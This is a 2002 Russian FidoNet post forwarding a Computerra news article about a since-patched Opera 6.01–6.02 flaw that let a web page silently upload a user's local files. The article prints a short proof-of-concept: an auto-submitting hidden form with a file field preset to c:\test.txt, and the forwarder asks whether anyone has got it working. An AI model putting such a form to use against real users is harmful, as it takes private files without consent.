ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Ruslan Tebuev                        2:5061/6.102   29 May 2002  08:02:44
 To : All
 Subject : [FWD] "http://www.computerra.ru/online/firstpage/newsofday/18109/forpri
 -------------------------------------------------------------------------------- 
 

 * Переслал Ruslan Tebuev (2:5061/6.102)
 * Обл. : RU.COMPUTERRA (RU.COMPUTERRA)
 * От   : Pavel Martynov, 2:5020/400 (29 Май 02 03:18)
 * Кому : All
 * Тема : "http://www.computerra.ru/online/firstpage/newsofday/18109/forprint.h
 =============================================================================
 From: "Pavel Martynov" <pmart@onego.ru>
    Компьютерра / Онлайн
    материалы / "http://www.computerra.ru/online/firstpage">Hа первой
    странице / "http://www.computerra.ru/online/firstpage/newsofday">Hовос
    ть дня: факты и комментарии
    "http://www.computerra.ru/online/firstpage/newsofday/18109/forprint.h
    tml"
 
    >Версия для печати
 
    Сага об Opera
 
    Дата публикации: 28.05.2002
 
    Олег Парамонов, opa@au.ru
 
    По сообщению GreyMagic Software, в одном из самых популярных
    браузеров, Opera (касается версий 6.01 и 6.02), обнаружена уязвимость,
    которая позволяет легко получить с жесткого диска пользователя любой
    файл. Hовости, скажем прямо, плохие. Hовости хорошие: первая -
    уязвимость существует в версии браузера для Windows, вторая - "дыра"
    залатана в версии Opera 6.03. Самое смешное, что в Opera 6.0 такой
    проблемы не существует.
 
    Проблема заключается в том, как Opera обрабатывает работает с
    передачей файлов по протоколу HTTP. Обычно пользователь видит
    появляющееся диалоговое окно с уведомлением, что передача файлов
    готова начаться. Однако в этом случае возможно изменить атрибут value
    (значение) так, чтобы окно с предупреждением не выдавалось и
    создавалось впечатление, что никакой передачи файлов осуществляться не
    будет.
 
    Вот вам и код "вредоносной" формы:
 
    <body onload="document.secForm.submit()">
 
    <form method="post" enctype="multipart/form-data" action="recFile.php"
    name="secForm">
 
    <input type="file" name="expFile" value="c:\test.txt
"
    style="visibility:hidden">
 
    </form>
 
    </body>
 
    (в результате с машины будет передан файл test.txt из корневого
    каталога диска C:)
 
    Обратите внимание, чем заканчивается строка value (
). Вот тут-то
    и кроется обман. Это - атрибут, который, по идее, нельзя установить.
 
    Hесколько забавных демонстраций можно найти на сайте GreyMagic.
 
    Обсудить в "http://www.computerra.ru/online/forums/ctonline">форуме
 
    P.S. Данная статья не является попыткой "унизить" Opera по сравнению
    с другими браузерами. Я сам пользуюсь Opera, начиная с версии 3.5 и не
    собираюсь менять ее на что-то другое.
 
    Олег Парамонов
    opa@au.ru
 
    Рассылка "Компьютерры":
 
 --- ifmail v.2.15dev5
  + Origin: Computerra News Robot (2:5020/400)
 =============================================================================
 
 Привет All!
 
 Кто-нить пробовал использовать эту дырочку? Работает?
 
 Ruslan
 
 --- GoldED+/W32 1.1.5-20011130
  * Origin: Origin under construction (2:5061/6.102)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор